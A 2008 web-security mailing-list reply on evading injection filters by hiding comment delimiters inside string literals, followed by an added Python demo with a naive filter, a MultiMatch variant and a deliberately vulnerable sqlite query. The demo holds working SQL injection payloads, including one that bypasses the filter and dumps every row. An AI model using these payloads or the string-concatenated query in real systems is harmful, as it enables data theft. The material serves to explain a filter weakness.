Re: [WEB SECURITY] XSS/injection/... evading technique
- From: Nick Gearls <nickgearls@xxxxxxxxx>
- Subject: Re: [WEB SECURITY] XSS/injection/... evading technique
- Date: Fri, 25 Jul 2008 17:24:55 +0200
> While nesting attack payloads inside of Comments may indeed help to
> bypass basic filters that remove/ignore this data after
> normalization, this same transport area will effectively prevent the
> back-end system from executing it because it skips over the Comment
> data.
Not if you enclose the commenting characters in a string.
Anyway, we see no real solution with string parsers, although MultiMatch
(before and after) may enhance the situation.
Nick
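Worked example, added here and not part of Nick's message or the original thread: a Python script that models a hypothetical naive filter which keyword-matches only after stripping `/* ... */` comments, a "before and after" (MultiMatch-style) variant of the same filter, and a hypothetical vulnerable backend that concatenates the input into a quoted string literal and runs it against sqlite. The table, rows, filter rules and payloads are all constructed for the demo.

```python
import re
import sqlite3

# Constructed sample data for the demo; not from the original thread.
ROWS = [("alice", "s3cret"), ("bob", "hunter2"), ("carol", "letmein")]
KEYWORDS = re.compile(r"\b(or|union|select)\b", re.IGNORECASE)
# A naive comment stripper: removes /* ... */ without tracking whether the
# delimiters sit inside a SQL string literal.  An unterminated comment is
# taken to run to the end of the input.
COMMENT = re.compile(r"/\*.*?(?:\*/|$)", re.DOTALL)


def normalize(user_input: str) -> str:
    """Drop everything the naive stripper believes is comment data."""
    return COMMENT.sub("", user_input)


def naive_filter(user_input: str) -> bool:
    """Hypothetical filter that keyword-matches only the normalized text.
    Returns True when the input is allowed through."""
    return KEYWORDS.search(normalize(user_input)) is None


def multimatch_filter(user_input: str) -> bool:
    """Same keyword check, applied both before and after normalization."""
    return all(KEYWORDS.search(view) is None
               for view in (user_input, normalize(user_input)))


def run_query(user_input: str) -> list:
    """Hypothetical vulnerable backend: the input is concatenated into a
    quoted string literal and executed by sqlite, whose tokenizer, like
    most SQL engines, treats /* inside a string literal as plain text
    and skips a real comment entirely."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", ROWS)
    query = f"SELECT name FROM users WHERE name = '{user_input}' ORDER BY name"
    return [row[0] for row in conn.execute(query)]


if __name__ == "__main__":
    cases = {
        # Keyword visible everywhere: the naive filter blocks it.
        "plain tautology": "' OR 'a'='a",
        # Payload inside a comment the backend also sees as a comment:
        # the filter lets it through, but the backend skips it (no rows).
        "payload in a real comment": "' /* OR 'a'='a */ || '",
        # Comment delimiters enclosed in string literals: the filter strips
        # "/*' OR '*/" as a comment, the backend reads three strings and an
        # OR, and the tautology '*/'='*/' returns every row.
        "comment delimiters inside strings": "/*' OR '*/'='*/",
    }
    for label, payload in cases.items():
        print(f"{label}: naive={naive_filter(payload)} "
              f"multimatch={multimatch_filter(payload)} rows={run_query(payload)}")
```

The third payload is the case the message above describes: from the backend's point of view the `/*` and `*/` never open a comment because each sits inside a string literal, so the `OR` is live code, while a string-based stripper that does not track quote state removes exactly the span containing it. Matching both the raw and the normalized input catches this particular payload, since the keyword is visible in the raw text; it does not make keyword matching sound in general.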
----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec
Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/
Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA
Brought to you by http://www.webappsec.org